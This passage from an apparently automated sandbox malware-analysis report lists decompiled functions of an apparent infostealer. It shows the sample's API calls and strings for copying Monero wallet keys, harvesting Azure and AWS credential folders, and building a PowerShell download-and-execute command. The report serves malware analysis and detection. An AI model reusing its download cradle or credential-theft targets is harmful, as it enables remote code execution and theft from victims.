                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: b4121b0565e4c8408104dd8b1254e7cd65364662c05b6d8b34887354da8190a9
                            • Instruction ID: 039c1b0df98d2ca0db0c9e175bb241444388b12a6b5d08aa5b5920f8e11d6ff1
                            • Opcode Fuzzy Hash: b4121b0565e4c8408104dd8b1254e7cd65364662c05b6d8b34887354da8190a9
                            • Instruction Fuzzy Hash: 62B1BF71A112069BEB21FF75DA49BAF77A9AF44304F11202AF845D3351DBBCDC018BA8
                            Function 004457A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004457D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00445804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00445868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004458C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004458D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004458F8
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00445961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445988
                            • lstrlen.KERNEL32(00461794), ref: 0044599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004459B9
                            • lstrcat.KERNEL32(00000000,00461794), ref: 004459C5
                            • lstrlen.KERNEL32(00FFDE70), ref: 004459D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004459F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00445A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00445A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445BB5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00445BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445C70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 8fe83d77723b0604b93a68978ab24d48fc8424b9767fd2a055e971c47aa0ef81
                            • Instruction ID: 8f11f8809b9ba7760936ba8156b9029b1e7a8467e7166bb6da5f9bc54123da88
                            • Opcode Fuzzy Hash: 8fe83d77723b0604b93a68978ab24d48fc8424b9767fd2a055e971c47aa0ef81
                            • Instruction Fuzzy Hash: 5902D171A006059FDF21EF79C989AAFB7B9AF08304F14512AF845A3352DB78DC45CB98
                            Function 00431190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00431120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00431135
                              • Part of subcall function 00431120: RtlAllocateHeap.NTDLL(00000000), ref: 0043113C
                              • Part of subcall function 00431120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00431159
                              • Part of subcall function 00431120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00431173
                              • Part of subcall function 00431120: RegCloseKey.ADVAPI32(?), ref: 0043117D
                            • lstrcat.KERNEL32(?,00000000), ref: 004311C0
                            • lstrlen.KERNEL32(?), ref: 004311CD
                            • lstrcat.KERNEL32(?,.keys), ref: 004311E8
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043121F
                            • lstrlen.KERNEL32(00FF91A0), ref: 0043122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431251
                            • lstrcat.KERNEL32(00000000,00FF91A0), ref: 00431259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00431264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00431294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004312BA
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004312FF
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431335
                            • lstrcat.KERNEL32(00000000,?), ref: 0043133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431378
                            • lstrcat.KERNEL32(00000000), ref: 00431385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004313AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004313D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431401
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043143D
                              • Part of subcall function 0044EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0044EE12
                            • DeleteFileA.KERNEL32(?), ref: 00431471
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 65e20e3449bd46728a4f5249a2cfd6daaaf2db77b8a61e7bb93eea6664a58c5f
                            • Instruction ID: 8957c9b5279cbea23cb8797f93b247cdde40b9f0db5671a920c8503bbf80d9d9
                            • Opcode Fuzzy Hash: 65e20e3449bd46728a4f5249a2cfd6daaaf2db77b8a61e7bb93eea6664a58c5f
                            • Instruction Fuzzy Hash: 8DA1B571B002059BCB21EF75DD89A9FB7B9AF4C304F14216AF905E7261DB78DD018BA8
                            Function 0044E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0044E740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0044E769
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E79F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 0044E7C6
                            • memset.MSVCRT ref: 0044E805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0044E82D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E85F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 0044E886
                            • memset.MSVCRT ref: 0044E8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0044E8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E920
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0044E947
                            • memset.MSVCRT ref: 0044E986
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: d73a0b55b112b01a3037156e3d5b019def5bcbb0d00a5c2f3d59f9ba6d3296c4
                            • Instruction ID: 00a60d42f54d01d4c85108e25d9ffebbd3ef2764c925006d51def2230ecc665c
                            • Opcode Fuzzy Hash: d73a0b55b112b01a3037156e3d5b019def5bcbb0d00a5c2f3d59f9ba6d3296c4
                            • Instruction Fuzzy Hash: A471F971A40218ABDB25EB64DC46FED7378BF48700F101899BB199B1C1DAF89E448B69
                            Function 0044ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32 ref: 0044ABCF
                            • lstrlen.KERNEL32(00FFF160), ref: 0044ABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044AC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044AC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ACB7
                            • lstrlen.KERNEL32(00464AD4), ref: 0044ACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ACF3
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 0044ACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AD28
                            • lstrlen.KERNEL32(00464AD4), ref: 0044AD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AD5C
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 0044AD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AD91
                            • lstrlen.KERNEL32(00FFF148), ref: 0044ADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044ADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AE03
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044AE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044AE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AE6F
                            • lstrlen.KERNEL32(00000000), ref: 0044AE85
                            • lstrcpy.KERNEL32(00000000,00FFF340), ref: 0044AEB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: ace5988b18f2359da1d5fd3abd9619f7875c16ac44f70f9e0893feca8069fc18
                            • Instruction ID: 32017969dc491086e90b56b69906e7659bba699ce5f231ecccbec686a76707d1
                            • Opcode Fuzzy Hash: ace5988b18f2359da1d5fd3abd9619f7875c16ac44f70f9e0893feca8069fc18
                            • Instruction Fuzzy Hash: D1B1C270A506169BDB21EF74CD48BAFB3BAAF04304F14142AF81197260DBB8DD10CBA9
                            Function 004547E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,004472A4), ref: 004547E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 004547FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0045480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0045481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 0045482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00454840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00454851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00454862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00454873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00454884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00454895
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: 7d1127dd25ecd3878dee5a619fedd609dd0941988d9b5bc05cf3fc177e58b443
                            • Instruction ID: d34ef339fc5bb1dc1607d3be7d8af35ac6bc554dac571dc4f7813a252ca14b7f
                            • Opcode Fuzzy Hash: 7d1127dd25ecd3878dee5a619fedd609dd0941988d9b5bc05cf3fc177e58b443
                            • Instruction Fuzzy Hash: 3C11E871D96720AF87209FB4AC0DB963ABEBB0B7097142A1BF851D3160EAF94410DB65
                            Function 0044BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044BE53
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044BE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0044BE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044BEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0044BEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044BEEB
                            • lstrlen.KERNEL32(')"), ref: 0044BEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 0044BF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0044BF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044BF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0044BF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BFBA
                            • ShellExecuteEx.SHELL32(?), ref: 0044C00C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 8690ebc8ed28473a27b8c27a8be1ea68a08c1714467e7930253edf84982aedd3
                            • Instruction ID: 9ab8ae3350f736d33c8b69c322a217a4f9731ad0db3fb7d013cf56f3de71e5ab
                            • Opcode Fuzzy Hash: 8690ebc8ed28473a27b8c27a8be1ea68a08c1714467e7930253edf84982aedd3
                            • Instruction Fuzzy Hash: 8961B171A103059BDB21AFB5CD896AFBBA9EF48304F14242BF905D3251DBB8C9058B99
                            Function 00451820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0045184F
                            • lstrlen.KERNEL32(00FE6D00), ref: 00451860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004518C1
                            • lstrlen.KERNEL32(00464FA0), ref: 004518D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004518F4
                            • lstrcat.KERNEL32(00000000,00464FA0), ref: 00451900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045192F
                            • lstrlen.KERNEL32(00FE6D20), ref: 00451945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004519A6
                            • lstrlen.KERNEL32(00464FA0), ref: 004519B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004519D9
                            • lstrcat.KERNEL32(00000000,00464FA0), ref: 004519E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A14
                            • lstrlen.KERNEL32(00FE6D30), ref: 00451A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A8B
                            • lstrlen.KERNEL32(00FE6D50), ref: 00451AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B02
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
